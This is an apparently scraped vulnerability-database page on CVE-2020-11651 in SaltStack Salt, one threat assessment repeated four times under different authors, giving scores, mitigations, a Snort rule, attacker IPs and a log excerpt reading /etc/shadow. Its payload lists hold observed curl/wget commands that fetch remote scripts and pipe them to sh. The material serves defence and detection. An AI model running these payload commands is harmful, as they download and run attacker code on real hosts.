Lucene search

K
attackerkbAttackerKBAKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C
HistoryApr 30, 2020 - 12:00 a.m.

CVE-2020-11651

2020-04-3000:00:00
attackerkb.com
127

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

Recent assessments:

kevthehermit at May 01, 2020 8:19pm UTC reported:

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests. one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651&gt;

The POC and others I am sure will appear shortly has the following functionality

  • Read the root key

  • Read and Write files on the Salt Master

  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/&gt;

Mitigations:

Patch to the latest versions and do not expose theses ports to the external network.

Detections

examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -&gt; $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.

  • 95.181.178.108

  • 89.151.132.112

  • 89.27.255.58

  • 104.244.76.189

  • 95.213.139.92

  • 81.92.218.74

  • 178.44.87.133

Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)

  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='

  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh

  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]

hrbrmstr at May 04, 2020 10:40am UTC reported:

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests. one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651&gt;

The POC and others I am sure will appear shortly has the following functionality

  • Read the root key

  • Read and Write files on the Salt Master

  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/&gt;

Mitigations:

Patch to the latest versions and do not expose theses ports to the external network.

Detections

examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -&gt; $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.

  • 95.181.178.108

  • 89.151.132.112

  • 89.27.255.58

  • 104.244.76.189

  • 95.213.139.92

  • 81.92.218.74

  • 178.44.87.133

Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)

  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='

  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh

  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]

z0r1nga at April 30, 2020 11:57pm UTC reported:

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests. one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651&gt;

The POC and others I am sure will appear shortly has the following functionality

  • Read the root key

  • Read and Write files on the Salt Master

  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/&gt;

Mitigations:

Patch to the latest versions and do not expose theses ports to the external network.

Detections

examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -&gt; $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.

  • 95.181.178.108

  • 89.151.132.112

  • 89.27.255.58

  • 104.244.76.189

  • 95.213.139.92

  • 81.92.218.74

  • 178.44.87.133

Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)

  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='

  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh

  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]

wvu-r7 at May 04, 2020 7:36am UTC reported:

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests. one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651&gt;

The POC and others I am sure will appear shortly has the following functionality

  • Read the root key

  • Read and Write files on the Salt Master

  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/&gt;

Mitigations:

Patch to the latest versions and do not expose theses ports to the external network.

Detections

examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -&gt; $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.

  • 95.181.178.108

  • 89.151.132.112

  • 89.27.255.58

  • 104.244.76.189

  • 95.213.139.92

  • 81.92.218.74

  • 178.44.87.133

Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)

  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='

  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh

  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 4

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

Related for AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C